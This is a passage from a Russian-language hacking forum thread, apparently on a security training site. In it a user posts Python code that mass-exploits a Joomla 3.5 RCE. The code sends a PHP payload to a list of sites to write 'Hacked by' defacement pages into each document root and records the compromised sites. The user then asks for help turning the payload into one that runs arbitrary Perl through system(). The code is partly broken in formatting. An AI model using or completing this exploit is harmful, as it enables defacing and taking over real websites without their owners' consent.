• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

payload

K

kamaz

Привет возник такой в эксплойтах типа RCE используют пайлоды ,
вот пример создания страницы пхп с Hacked by

pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/Mah.php','w+'),file_get_contents(' fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/Mah.htm','w+'),'Hacked by');")
for i in fil.readlines():
try:
i=i.strip()
print get_url(i, pl)
lala=requests.get(i+"/Mah.htm")
if "Hacked" in lala.content:
z=open('Joomla_3.5_Shell.txt','a')
z.write(i+"/Mah.htm\n")
z.close()
except:
pass

fil.close()

Моя задача создать файл main.pl добавить в него некий код после чего исполнить perl main.pl

такое возможно сделать?
 
K

kamaz

хороший человек подсказал чтос помощью функции system это делаеться,может кто то помоч
привести это в рабочий вид?
спасибо
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!